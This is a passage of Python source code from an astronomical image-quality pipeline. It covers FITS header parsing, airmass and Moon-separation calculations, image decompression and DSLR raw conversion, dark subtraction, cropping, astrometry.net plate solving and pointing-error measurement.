None\n self.SExtractor_results = None\n self.position_angle = None\n self.zero_point = None\n self.zero_point_mode = None\n self.zero_point_median = None\n self.zero_point_average = None\n self.zero_point_correlation = None\n self.zero_point_plotfile = None\n self.total_process_time = None\n self.FWHM = None\n self.FWHM_median = None\n self.FWHM_mode = None\n self.FWHM_average = None\n self.ellipticity = None\n self.ellipticity_median = None\n self.ellipticity_mode = None\n self.ellipticity_average = None\n self.PSF_plot_file = None\n self.pointing_error = None\n self.image_flipped = None\n self.jpeg_file_names = []\n self.cropped = False\n self.crop_x1 = None\n self.crop_x2 = None\n self.crop_y1 = None\n self.crop_y2 = None\n self.original_nXPix = None\n self.original_nYPix = None\n self.SCAMP_catalog = None\n self.SCAMP_successful = False\n self.catalog_name = None\n self.catalog_data = None\n self.flags = {\n 'FWHM': False,\\\n 'ellipticity': False,\\\n 'pointing error': False,\\\n 'zero point': False,\\\n 'blank': False,\\\n }\n\n def __del__(self):\n# print('Deleting object referring to {}'.format(self.raw_file_name))\n if self.logger:\n self.logger = None\n if self.temp_files:\n for item in self.temp_files:\n if os.path.exists(item):\n# print(\" Deleting {0}\".format(item))\n os.remove(item)\n\n def __enter__(self):\n return self\n\n def __exit__(self ,type, value, traceback):\n logging.shutdown()\n self.__del__()\n\n\n ##-------------------------------------------------------------------------\n ## Make Logger Object\n ##-------------------------------------------------------------------------\n def get_logger(self, logger):\n '''Add an existing logger object to the Image object. Use this if\n calling from another program which has its own logger object, pass\n that logger to IQMon with this method.\n \n Parameters\n ----------\n logger : logging.logger object\n The logger which you wish to use with this image.\n '''\n self.logger = logger\n\n ## Print Configuration to Log\n self.logger.debug('Using configuration:')\n for entry in self.tel.config.keys():\n self.logger.debug(' {} = {}'.format(entry, self.tel.config[entry]))\n\n\n def make_logger(self, logfile=None, clobber=False, verbose=False, nofile=False):\n '''Create a logger object to use with this image. The logger object\n will be available as self.logger.\n \n Parameters\n ----------\n logfile : file to write log to\n \n clobber : defaults to False. If clobber is True, the old log file will\n be deleted.\n \n verbose : Defaults to False. If verbose is true, it sets the logging\n level to DEBUG (otherwise level is INFO).\n '''\n self.logger = logging.getLogger(self.raw_file_basename.replace('.', '_'))\n if len(self.logger.handlers) == 0:\n self.logger.setLevel(logging.DEBUG)\n LogFormat = logging.Formatter('%(asctime)23s %(levelname)8s: %(message)s')\n ## Log to a file\n if not nofile:\n if not logfile:\n logfile = os.path.join(self.tel.logs_file_path, '{}_IQMon.log'.format(self.raw_file_basename))\n self.logfile = logfile\n self.logfilename = os.path.split(self.logfile)[1]\n if clobber:\n if os.path.exists(logfile): os.remove(logfile)\n LogFileHandler = logging.FileHandler(logfile)\n LogFileHandler.setLevel(logging.DEBUG)\n LogFileHandler.setFormatter(LogFormat)\n self.logger.addHandler(LogFileHandler)\n ## Log to console\n LogConsoleHandler = logging.StreamHandler(stream=sys.stdout)\n if verbose:\n LogConsoleHandler.setLevel(logging.DEBUG)\n else:\n LogConsoleHandler.setLevel(logging.INFO)\n LogConsoleHandler.setFormatter(LogFormat)\n self.logger.addHandler(LogConsoleHandler)\n\n ## Put initial lines in log\n self.logger.info(\"###### Processing Image {} ######\".format(self.raw_file_name))\n self.logger.info('IQMon version = {}'.format(__version__))\n\n ## Print Configuration to Log\n if 'name' in self.tel.config.keys():\n self.logger.debug('Using configuration for telescope: {}'.format(self.tel.config['name']))\n else:\n self.logger.debug('Using configuration:')\n for entry in self.tel.config.keys():\n self.logger.debug(' {} = {}'.format(entry, self.tel.config[entry]))\n\n\n ##-------------------------------------------------------------------------\n ## Read Header\n ##-------------------------------------------------------------------------\n def read_header(self):\n '''Reads information from the image fits header and stores values as\n properties of itself. File must have a .fts, .fits, or .fit extension.\n '''\n start_time = datetime.datetime.now()\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can not read fits header from non-fits file.')\n return False\n self.logger.info(\"Reading image header.\")\n if not self.working_file:\n with fits.open(self.raw_file, ignore_missing_end=True) as hdulist:\n self.header = hdulist[0].header\n self.nYPix, self.nXPix = hdulist[0].data.shape\n self.logger.debug(' Image size is: {},{}'.format(\\\n self.nXPix, self.nYPix))\n else:\n with fits.open(self.working_file, ignore_missing_end=True) as hdulist:\n self.header = hdulist[0].header\n self.nYPix, self.nXPix = hdulist[0].data.shape\n self.logger.debug(' Image size is: {},{}'.format(\\\n self.nXPix, self.nYPix))\n\n ## Get exposure time from header (assumes seconds)\n try:\n self.exptime = float(self.header['EXPTIME']) * u.s\n except:\n self.exptime = None\n self.logger.debug(\" No exposure time value found in header\")\n else:\n self.logger.debug(\" Exposure time = {0:.1f} s\".format(\\\n self.exptime.to(u.s).value))\n ## Get filter from header\n try:\n self.filter = str(self.header['FILTER'])\n except:\n self.filter = None\n self.logger.debug(\" No filter value found in header\")\n else:\n self.logger.debug(\" filter = {}\".format(self.filter))\n ## Get object name from header\n try:\n self.object_name = self.header[\"OBJECT\"]\n except:\n self.object_name = None\n self.logger.debug(\" No object value found in header\")\n else:\n self.logger.debug(\" Header object name = {0}\".format(\n self.object_name))\n ## Get Observation Date and Time from header\n ## (assumes YYYY-MM-DDTHH:MM:SS format)\n try:\n self.observation_date = self.header[\"DATE-OBS\"]\n except:\n self.observation_date = None\n self.logger.debug(\" No date value found in header\")\n else:\n self.logger.debug(\" Header date = {0}\".format(self.observation_date))\n\n if not self.tel.latitude:\n ## Get Site Latitude from header (assumes decimal degrees)\n try:\n self.latitude = self.header[\"LAT-OBS\"] * u.deg\n except:\n self.latitude = None\n self.logger.debug(\" No latitude value found in header\")\n else:\n self.logger.debug(\" Header latitude = {0:.4f} deg\".format(\\\n self.latitude.to(u.deg).value))\n else:\n self.latitude = self.tel.latitude\n\n if not self.tel.longitude:\n ## Get Site Longitude from header (assumes decimal degrees)\n try:\n self.longitude = self.header[\"LONG-OBS\"] * u.deg\n except:\n self.longitude = None\n self.logger.debug(\" No longitiude value found in header\")\n else:\n self.logger.debug(\" Header longitiude = {0:.4f} deg\".format(\\\n self.longitude.to(u.deg).value))\n else:\n self.longitude = self.tel.longitude\n\n if not self.tel.altitude:\n ## Get Site Altitude from header (assumes meters)\n try:\n self.altitude = self.header[\"ALT-OBS\"] * u.meter\n except:\n self.altitude = None\n self.logger.debug(\" No altitude value found in header\")\n else:\n self.logger.debug(\" Header altitude = {0:.0f} meters\".format(\\\n self.altitude.to(u.meter).value))\n else:\n self.altitude = self.tel.altitude\n\n ## Read Header Coordinates in to astropy coordinates object\n self.coordinate_from_header = None\n if ('RA' in self.header.keys()) and ('DEC' in self.header.keys()):\n ## Header RA is : separated\n coord_string = '{} {}'.format(self.header['RA'], self.header['DEC'])\n self.logger.debug(' Parsing: \"{}\" as hours and degrees'.format(coord_string))\n try:\n self.coordinate_from_header = coords.SkyCoord(coord_string,\\\n unit=(u.hour, u.degree),\\\n frame='icrs')\n except:\n self.logger.debug(' Parsing: \"{}\" as hours and degrees failed'.format(coord_string))\n \n if not self.coordinate_from_header:\n self.logger.info(' Could not parse coordinate strings from header')\n self.logger.info(' RA = {}'.format(self.header['RA']))\n self.logger.info(' DEC = {}'.format(self.header['DEC']))\n\n ## Read WCS\n try:\n self.image_WCS = wcs.WCS(self.header)\n except:\n self.image_WCS = None\n self.logger.info(\" No WCS found in image header\")\n else:\n self.logger.debug(\" Found WCS in image header.\")\n for item in self.image_WCS.to_header().cards:\n self.logger.debug(' {}'.format(item))\n\n ## Determine PA of Image\n# if self.image_WCS:\n# self.orientation_from_wcs()\n# if self.position_angle:\n# self.logger.debug(\" Position angle of WCS is {0:.1f} deg\".format(\\\n# self.position_angle.to(u.deg).value))\n# if self.image_flipped:\n# self.logger.debug(\" Image is mirrored.\")\n\n ## Determine Alt, Az, Moon Sep, Moon Illum using ephem module\n if self.observation_date and self.latitude and self.longitude and self.coordinate_from_header:\n ## Populate site object properties\n SiteDate = \"/\".join(self.observation_date[0:10].split(\"-\"))\n SiteTime = self.observation_date[11:] \n self.tel.site.date = ephem.Date(SiteDate+\" \"+SiteTime)\n self.tel.site.lat = str(self.latitude.to(u.deg).value)\n self.tel.site.lon = str(self.longitude.to(u.deg).value)\n if self.altitude:\n self.tel.site.elevation = self.altitude.to(u.meter).value\n ## Do calculations using ephem\n RADEC_string = ','.join(self.coordinate_from_header.to_string('hmsdms', sep=':').split())\n TargetObject = ephem.readdb(\"Target,f|M|F7,{},2.02,2000\".format(RADEC_string))\n TargetObject.compute(self.tel.site)\n self.target_alt = TargetObject.alt * 180./ephem.pi * u.deg\n self.target_az = TargetObject.az * 180./ephem.pi * u.deg\n self.logger.debug(\" Target Alt, Az = {0:.1f}, {1:.1f}\".format(\\\n self.target_alt.to(u.deg).value,\\\n self.target_az.to(u.deg).value))\n self.target_zenith_angle = 90.*u.deg - self.target_alt\n self.airmass = 1.0/math.cos(self.target_zenith_angle.to(u.radian).value)\\\n * (1.0 - 0.0012*(1.0/(math.cos(\\\n self.target_zenith_angle.to(u.radian).value)**2 - 1.0)))\n self.logger.debug(\" Target airmass (calculated) = {0:.2f}\".format(\\\n self.airmass))\n ## Calculate Moon Position and Illumination\n TheMoon = ephem.Moon()\n TheMoon.compute(self.tel.site)\n self.moon_phase = TheMoon.phase\n self.moon_sep = ephem.separation(TargetObject, TheMoon)\n self.moon_sep = self.moon_sep * 180./ephem.pi * u.deg\n self.moon_alt = TheMoon.alt * 180./ephem.pi * u.deg\n if self.moon_alt > 0:\n self.logger.debug(\" A {0:.0f} percent illuminated Moon is {1:.0f} deg from target.\".format(\\\n self.moon_phase,\\\n self.moon_sep.to(u.deg).value))\n else:\n self.logger.debug(\" A {0:.0f} percent illuminated Moon is down.\".format(\\\n self.moon_phase))\n else:\n self.target_alt = None\n self.target_az = None\n self.moon_phase = None\n self.moon_sep = None\n self.moon_alt = None\n self.target_zenith_angle = None\n self.airmass = None\n self.logger.warning(\"Object and Moon positions not calculated.\")\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done reading image header in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Edit Header\n ##-------------------------------------------------------------------------\n def edit_header(self, keyword, value, comment=None):\n '''Edit a single keyword in the image fits header. File must have a\n .fts, .fits, or .fit extension.\n \n Input\n -----\n keyword : a string representing a valid FITS keyword.\n \n value : The value to enter for that keyword.\n \n Parameters\n ----------\n comment : comment string for the keyword entry\n '''\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can not read fits header from non-fits file.')\n return False\n self.logger.info('Editing image header: {} = {}'.format(keyword, value))\n with fits.open(self.working_file, ignore_missing_end=True, mode='update') as hdulist:\n hdulist[0].header[keyword] = value\n if comment:\n hdulist[0].header.comments[keyword] = comment\n hdulist.flush()\n\n\n ##-------------------------------------------------------------------------\n ## Uncompress image\n ##-------------------------------------------------------------------------\n def uncompress(self, timeout=20):\n '''Method to use funpack to uncompress a compressed fits image. File\n must have a .fts, .fits, or .fit extension.\n\n Parameters\n ----------\n timeout : int, optional\n Seconds before the command is considered frozen and the process call\n times out. Default is 20.\n '''\n if not self.working_file:\n self.logger.warning('Must have working file to uncompress file')\n return False\n if self.file_ext.lower() not in ['.fts', '.fits', '.fit']:\n self.logger.warning('Can funpack a non-fits file.')\n return False\n\n try:\n result = subprocess.check_output(['fpack', '-L', self.working_file], timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('fpack timed out')\n return False\n except:\n self.logger.warning('Could not run fpack to check compression status')\n return False\n\n found_compression_info = False\n for line in result.split('\\n'):\n regexp = '\\s*\\d+\\s+IMAGE\\s+([\\w/=\\.]+)\\s(BITPIX=[\\-\\d]+)\\s(\\[.*\\])\\s([\\w]+)'\n IsMatch = re.match(regexp, line)\n if IsMatch:\n self.logger.debug(' fpack -L Output: {}'.format(line))\n if re.search('not_tiled', IsMatch.group(4)) and\\\n not re.search('no_pixels', IsMatch.group(3)):\n self.logger.debug(' Image is not compressed')\n found_compression_info = True\n elif re.search('tiled_rice', IsMatch.group(4)):\n self.logger.debug(' Image is rice compressed. Running funpack.')\n found_compression_info = True\n if not found_compression_info:\n self.logger.warning('Could not determine compression status')\n else:\n try:\n subprocess.call(['funpack', '-F', self.working_file], timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('funpack timed out')\n except:\n self.logger.warning('Failed to run funpack')\n\n ##-------------------------------------------------------------------------\n ## Read Image\n ##-------------------------------------------------------------------------\n def read_image(self, timeout=20):\n '''Read the raw image and write out a working image in the IQMon\n temporary directory.\n \n If the raw file is a fits file (.fit, .fts, or .fits extension), the\n working file will be standardized to have a .fits file extension\n \n If the raw file is a fits file and is found to be fpack compressed,\n the working file will be uncompressed.\n \n If the raw file is a DSLR raw file (.cr2 or .dng), then the working file\n will be converted to a fits file. First, dcraw is called to convert to\n a .ppm file using the -4 option which forces a linear conversion (no\n gamma correction) of the pixel values to 16 bit integers. Then the .ppm\n file is ocnverted to a fits image using either the pamtofits or\n pnmtofits tools. The final fits file will be three dimensional with the\n third dimension being the color channels (R, G, B).\n \n Parameters\n ----------\n timeout : int, optional\n Seconds before the command is considered frozen and the process call\n times out. Default is 20.\n '''\n start_time = datetime.datetime.now()\n chmod_code = stat.S_IRUSR | stat.S_IWUSR | stat.S_IRGRP | stat.S_IWGRP | stat.S_IROTH | stat.S_IWOTH\n if self.working_file:\n if os.path.exists(self.working_file): os.remove(self.working_file)\n ## fts extension: make working copy and rename to .fits\n if self.file_ext in ['.fts', '.fit']:\n self.logger.info('Making working copy of raw image: {}'.format(\\\n self.raw_file_name))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+'.fits')\n# shutil.copy2(self.raw_file, self.working_file)\n subprocess.call(['cp', self.raw_file, self.working_file], timeout=timeout)\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n self.file_ext = '.fits'\n self.uncompress()\n ## fits extension: make working copy\n elif self.file_ext == '.fits':\n self.logger.info('Making working copy of raw image: {}'.format(\\\n self.raw_file_name))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_name)\n shutil.copy2(self.raw_file, self.working_file)\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n self.file_ext = '.fits'\n self.uncompress()\n ## DSLR file: convert to fits\n elif self.file_ext.lower() in ['.dng', '.cr2']:\n self.logger.info('Converting {} to fits format'.format(\\\n self.raw_file_name))\n ## Make copy of raw file\n self.working_file = os.path.join(self.tel.temp_file_path, self.raw_file_name)\n self.logger.debug('Copying {} to {}'.format(self.raw_file, self.working_file))\n shutil.copy2(self.raw_file, self.working_file)\n self.logger.debug('Setting working file permissions for {}'.format(self.working_file))\n os.chmod(self.working_file, chmod_code)\n self.temp_files.append(self.working_file)\n ## Use dcraw to convert to ppm file\n command = ['dcraw', '-t', '2', '-4', self.working_file]\n self.logger.debug('Executing dcraw: {}'.format(repr(command)))\n subprocess.call(command, timeout=timeout)\n ppm_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'.ppm')\n if os.path.exists(ppm_file):\n self.working_file = ppm_file\n self.temp_files.append(self.working_file)\n else:\n self.logger.critical('dcraw failed. Could not find ppm file.')\n ## Use pamtofits to convert to fits file\n fits_file = os.path.join(self.tel.temp_file_path, self.raw_file_basename+'.fits')\n if os.path.exists(fits_file): os.remove(fits_file)\n conversion_tools = ['pamtofits', 'pnmtofits']\n for conversion_tool in conversion_tools:\n if not os.path.exists(fits_file):\n command = '{} {} > {}'.format(conversion_tool, self.working_file, fits_file)\n self.logger.debug('Trying {}: {}'.format(conversion_tool, command))\n try:\n subprocess.call(command, shell=True, timeout=timeout)\n except:\n pass\n if os.path.exists(fits_file):\n self.working_file = fits_file\n self.file_ext = self.file_ext = os.path.splitext(self.working_file)[1]\n self.temp_files.append(self.working_file)\n else:\n self.logger.critical('PPM to fits conversion failed. Could not find fits file.')\n ## Write new fits file with only green image\n self.logger.debug('Only keeping green channel for analysis')\n with fits.open(self.working_file, 'update') as hdulist:\n if len(hdulist) == 1:\n data = hdulist[0].data\n green_data = data[1]\n hdulist[0].data = green_data\n hdulist.flush()\n else:\n self.logger.warning('Unrecognixed file extension: {}'.format(\\\n self.file_ext))\n self.working_file = os.path.join(self.tel.temp_file_path,\\\n self.raw_file_name)\n raise IOError('Unrecognixed file extension: {}'.format(self.file_ext))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done making working copy of image in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Dark Subtract Image\n ##-------------------------------------------------------------------------\n def dark_subtract(self, Darks):\n '''Create a master dark and subtract from image.\n\n Input\n -----\n Darks : list or string\n If a list of filenames is provided, then the fits files listed will\n be read in and median combined to form a master dark file. If only\n a single filename is provided, then that will be treated as the\n master dark file. The master dark is then subtracted from the\n working file.\n '''\n start_time = datetime.datetime.now()\n self.logger.info(\"Dark subtracting image.\")\n self.logger.debug(\" Opening image data.\")\n with fits.open(self.working_file, mode='update') as hdulist_image:\n ## Load master dark if provided, but if multiple files input, combine\n ## them in to master dark, then load combined master dark.\n if type(Darks) == str:\n if os.path.exists(Darks):\n self.logger.debug(\" Found master dark. Opening master dark data.\")\n with fits.open(Darks) as hdulist_dark:\n MasterDarkData = hdulist_dark[0].data\n else:\n self.logger.warning(' Could not find master dark {}'.format(Darks))\n return False\n elif type(Darks) == list:\n if len(Darks) == 0:\n self.logger.warning(' No input darks found')\n return False\n if len(Darks) == 1:\n if os.path.exists(Darks[0]):\n self.logger.debug(\" Found master dark. Opening master dark data.\")\n with fits.open(Darks[0]) as hdulist_dark:\n MasterDarkData = hdulist_dark[0].data\n else:\n self.logger.warning(' Could not find master dark {}'.format(Darks[0]))\n return False\n else:\n self.logger.info(\" Median combining {0} darks.\".format(len(Darks)))\n ## Combine multiple darks frames\n DarkData = []\n for Dark in Darks:\n with fits.open(Dark) as hdulist:\n DarkData.append(hdulist[0].data)\n DarkData = np.array(DarkData)\n MasterDarkData = np.median(DarkData, axis=0)\n ## Save Master Dark to Fits File\n DataPath = os.path.split(self.raw_file)[0]\n DataNightString = os.path.split(DataPath)[1]\n MasterDarkFilename = 'MasterDark_{}_{}_{}.fits'.format(\\\n self.tel.name,\\\n DataNightString,\\\n str(int(math.floor(self.exptime.to(u.s).value)))\n )\n MasterDarkFile = os.path.join(self.tel.temp_file_path,\\\n MasterDarkFilename)\n hdu_MasterDark = fits.PrimaryHDU(MasterDarkData)\n hdulist_MasterDark = fits.HDUList([hdu_MasterDark])\n hdulist_MasterDark.header = hdulist[0].header\n hdulist_MasterDark.header['history'] = \\\n \"Combined {0} images to make this master dark.\".format(\\\n len(Darks))\n self.logger.debug(\" Writing master dark file: {0}\".format(\\\n MasterDarkFile))\n hdulist_MasterDark.writeto(MasterDarkFile)\n else:\n self.logger.error(\" Could not find master dark file(s) {}\".format(Darks))\n return False\n\n ## Now Subtract MasterDark from Image\n self.logger.debug(\" Subtracting dark from image.\")\n ImageData = hdulist_image[0].data\n DifferenceImage = ImageData - MasterDarkData\n hdulist_image[0].data = DifferenceImage\n hdulist_image.flush()\n self.logger.debug(\" Median level of image = {0}\".format(\n np.median(ImageData)))\n self.logger.debug(\" Median level of dark = {0}\".format(\\\n np.median(MasterDarkData)))\n self.logger.debug(\" Median level of dark subtracted = {0}\".format(\\\n np.median(DifferenceImage)))\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done with dark subtraction in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n\n\n ##-------------------------------------------------------------------------\n ## Crop Image\n ##-------------------------------------------------------------------------\n def crop(self):\n '''\n Crop working image to region of interest.\n '''\n if self.tel.ROI:\n MatchROI = re.match(\"\\[?(\\d{1,6}):(\\d{1,6}),(\\d{1,6}):(\\d{1,6})\\]?\",\\\n self.tel.ROI)\n if MatchROI:\n self.logger.info('Cropping image to {}'.format(self.tel.ROI))\n\n crop_x1 = int(MatchROI.group(1))\n crop_x2 = int(MatchROI.group(2))\n crop_y1 = int(MatchROI.group(3))\n crop_y2 = int(MatchROI.group(4))\n self.logger.debug(\" Cropping Image To [{0}:{1},{2}:{3}]\".format(\\\n crop_x1, crop_x2, crop_y1, crop_y2))\n with fits.open(self.working_file, mode=\"update\") as hdulist:\n hdulist[0].data = hdulist[0].data[crop_y1:crop_y2,\\\n crop_x1:crop_x2]\n if ('CRPIX1' in hdulist[0].header) and\\\n ('CRPIX2' in hdulist[0].header):\n hdulist[0].header['CRPIX1'] -= crop_x1\n hdulist[0].header['CRPIX2'] -= crop_y1\n hdulist.flush()\n self.cropped = True\n self.original_nXPix = self.nXPix\n self.original_nYPix = self.nYPix\n self.read_header()\n else:\n self.logger.warning('Can not crop image. ROI \"{}\" not parsed.'.format(\\\n self.tel.ROI))\n return False\n else:\n self.logger.warning('Can not crop image. No region of interest defined.')\n return False\n\n\n ##-------------------------------------------------------------------------\n ## Solve Astrometry Using astrometry.net\n ##-------------------------------------------------------------------------\n def solve_astrometry(self, downsample=None, SIP=None, timeout=60):\n '''\n Solve astrometry in the working image using the astrometry.net solver.\n '''\n start_time = datetime.datetime.now()\n self.logger.info(\"Attempting to solve WCS using Astrometry.net solver.\")\n AstrometryCommand = [\"solve-field\", \"-O\", \"-p\",\n \"-L\", str(self.tel.pixel_scale.value*0.75),\n \"-H\", str(self.tel.pixel_scale.value*1.25),\n \"-u\", \"arcsecperpix\"]\n if not SIP:\n AstrometryCommand.extend(['-T'])\n else:\n try:\n SIP_order = int(SIP)\n AstrometryCommand.extend(['-t', str(SIP_order)])\n except:\n AstrometryCommand.extend(['-T'])\n if downsample:\n AstrometryCommand.extend([\"-z\", str(downsample)])\n AstrometryCommand.append(self.working_file)\n with open(os.path.join(self.tel.temp_file_path, 'astrometry_output.txt'), 'w') as AstrometrySTDOUT:\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n 'astrometry_output.txt'))\n self.logger.debug(' Calling astrometry.net with: {}'.format(\\\n ' '.join(AstrometryCommand)))\n\n StartTime = datetime.datetime.now()\n try:\n rtncode = subprocess.call(AstrometryCommand,\\\n stdout=AstrometrySTDOUT, stderr=AstrometrySTDOUT,\\\n timeout=timeout)\n except subprocess.TimeoutExpired as e:\n self.logger.warning('Astrometry.net timed out')\n rtncode = 1\n\n EndTime = datetime.datetime.now()\n duration = EndTime - StartTime\n\n with open(os.path.join(self.tel.temp_file_path, 'astrometry_output.txt'), 'r') as AstrometrySTDOUT:\n output = AstrometrySTDOUT.readlines()\n\n if rtncode != 0:\n self.logger.warning(\"Astrometry.net failed.\")\n for line in output:\n self.logger.debug(' astrometry.net output: {}'.format(line.strip('\\n')))\n self.astrometry_solved = False\n else:\n for line in output:\n self.logger.debug(' Astrometry.net Output: {}'.format(line.strip('\\n')))\n total_process_time = (EndTime - StartTime).total_seconds()\n self.logger.debug(\" Astrometry.net Processing Time: {:.1f} s\".format(\\\n total_process_time))\n regexp = \"Field center:\\s\\(RA\\sH:M:S,\\sDec D:M:S\\)\\s=\\s\"+\\\n \"\\((\\d{1,2}:\\d{2}:\\d{2}\\.\\d+,\\s[+-]?\\d{1,2}:\\d{2}:\\d{2}\\.\\d+)\\)\"\n IsFieldCenter = re.search(regexp, ''.join(output))\n if IsFieldCenter:\n self.logger.info(\" Astrometry.net field center is: {}\".format(\\\n IsFieldCenter.group(1)))\n else:\n self.logger.warning(\"Could not parse field center from astrometry.net output.\")\n for line in output:\n self.logger.debug(' astrometry.net output: {}'.format(line.strip('\\n')))\n\n NewFile = self.working_file.replace(self.file_ext, \".new\")\n NewFitsFile = self.working_file.replace(self.file_ext, \".new.fits\")\n if os.path.exists(NewFile):\n self.logger.debug(\" Found {}\".format(NewFile))\n self.logger.debug(\" Astrometry.net succeeded\")\n if os.path.exists(NewFitsFile): os.remove(NewFitsFile)\n os.rename(NewFile, NewFitsFile)\n self.astrometry_solved = True\n self.working_file = NewFitsFile\n self.read_header()\n else:\n self.logger.warning(\"No new file created by astrometry.net\")\n self.astrometry_solved = False\n ## Add files created by astrometry.net to temp_files list\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".axy\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".wcs\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".solved\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".rdls\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".match\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\n self.raw_file_basename+\".corr\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\".new.fits\"))\n self.temp_files.append(os.path.join(self.tel.temp_file_path,\\\n self.raw_file_basename+\"-indx.xyls\"))\n\n end_time = datetime.datetime.now()\n elapsed_time = end_time - start_time\n self.logger.info(' Done with astrometry.net in {:.1f} s'.format(\\\n elapsed_time.total_seconds()))\n return self.astrometry_solved\n\n\n ##-----------------------------------------------------------------------------\n ## Determine Orientation from WCS\n ##-----------------------------------------------------------------------------\n def orientation_from_wcs(self):\n '''\n Given an astropy.wcs.WCS object, return a tuple containing the pixel scale,\n position angle (in degrees), and the flipped state (a boolean) of the image\n calculated from the PCn_m matrix (no distortions considered).\n '''\n ## Check that the WCS exists in the image_WCS object\n if not self.image_WCS:\n self.read_header()\n if not self.image_WCS:\n self.logger.warning('No WCS found in header. No orientation calculated.')\n else:\n ## Check if the image_WCS is actually an astropy.wcs.WCS object\n if isinstance(self.image_WCS, wcs.WCS):\n ## By using the wcs to_header to make a new WCS object, we \n ## ensure that the CD matrix, if it exists, is converted to PC\n header = wcs.WCS(self.image_WCS.to_header()).to_header()\n if ('CTYPE1' in header.keys()) and ('CTYPE2' in header.keys()) and\\\n ('WCSAXES' in header.keys()):\n if (header['CTYPE1'][0:4] == 'RA--') or (header['CTYPE1'][0:4] == 'DEC-') and\\\n (header['CTYPE2'][0:4] == 'RA--') or (header['CTYPE2'][0:4] == 'DEC-') and\\\n (int(header['WCSAXES']) == 2) and\\\n ('PC1_1' in header.keys()) and\\\n ('PC1_2' in header.keys()) and\\\n ('PC2_1' in header.keys()) and\\\n ('PC2_2' in header.keys()) and\\\n ('CDELT1' in header.keys()) and\\\n ('CDELT2' in header.keys()):\n ## If the wcs in header format meets all of the above\n ## assumptions, do nothing and proceed to header analysis.\n self.logger.debug(' Header has expected keywords')\n# self.logger.debug(' {}'.format(header))\n else:\n self.logger.warning('WCS does not match expected contents.')\n for key in header.keys():\n self.logger.debug(' {:8s} = {}'.format(key, header[key]))\n header = None\n self.image_WCS = None\n else:\n self.logger.warning('WCS does not have expected keywords.')\n for key in header.keys():\n self.logger.debug(' {:8s} = {}'.format(key, header[key]))\n header = None\n self.image_WCS = None\n\n if header:\n ## By using the wcs to_header to make a new WCS object, we convert CD to PC\n PC = wcs.WCS(self.image_WCS.to_header()).wcs.pc\n cdelt1 = float(header['CDELT1'])\n cdelt2 = float(header['CDELT2'])\n\n ## Determine Pixel Scale\n result1 = PC.dot(np.array([[0], [1]]))\n pixel_scale1 = cdelt1*(math.sqrt(result1[0][0]**2 + result1[1][0]**2))*3600.\n result2 = PC.dot(np.array([[1], [0]]))\n pixel_scale2 = cdelt2*(math.sqrt(result2[0][0]**2 + result2[1][0]**2))*3600.\n ## Just average the pixel scale values for each direction\n pixel_scale = np.mean([pixel_scale1, pixel_scale2]) * u.arcsec/u.pix\n self.wcs_pixel_scale = pixel_scale\n\n ## Determine Position Angle\n PCnorm = pixel_scale.to(u.deg/u.pix).value\n angles = np.array([90*u.deg.to(u.radian) - np.arccos(PC[0][0]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arcsin(-1*PC[0][1]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arcsin(PC[1][0]/PCnorm),\\\n 90*u.deg.to(u.radian) - np.arccos(PC[1][1]/PCnorm),\\\n ]) * u.radian\n self.position_angle = angles[~np.isnan(angles)].mean().to(u.deg)\n\n ## Determine Flip State\n flipped = np.linalg.det(PC) > 0\n self.image_flipped = flipped\n else:\n self.wcs_pixel_scale = None\n self.position_angle = None\n self.image_flipped = None\n\n\n ##-------------------------------------------------------------------------\n ## Determine Pointing Error\n ##-------------------------------------------------------------------------\n def determine_pointing_error(self):\n '''\n Determine pointing error (difference between object's coordinates and\n solved WCS).\n '''\n self.logger.info(\"Detemining pointing error based on WCS solution\")\n try:\n center_from_WCS = self.image_WCS.wcs_pix2world([[self.nXPix/2, self.nYPix/2]], 1)\n self.logger.debug(\" Using coordinates of center point: {0} {1}\".format(\\\n center_from_WCS[0][0], center_from_WCS[0][1]))\n self.coordinate_of_center_pixel = coords.SkyCoord(\\\n ra=center_from_WCS[0][0],\\\n dec=center_from_WCS[0][1],\\\n unit=(u.degree, u.degree),\\\n frame='icrs')\n self.pointing_error = self.coordinate_of_center_pixel.separation(\\\n self.coordinate_from_header)\n self.logger.debug(\" Header Coordinate: {}\".format(\\\n self.coordinate_from_header.to_string(\\\n style='hmsdms', precision=1)))\n self.logger.debug(\" Center Coordinate: {}\".format(\\\n self.coordinate_of_center_pixel.to_string(\\\n style='hmsdms', precision=1)))\n self.logger.info(\" Pointing Error is {:.2f} arcmin\".format(\\\n self.pointing_error.arcminute))\n except:\n self.logger.warning(\"Pointing error not calculated.\")\n ## Flag pointing error\n try:\n if self.pointing_error.arcminute > self.tel.threshold_pointing_err.to(u.arcmin).value:\n self.flags['pointing error'] = True\n else:\n self.flags['pointing error'] = False\n except:\n pass\n\n\n 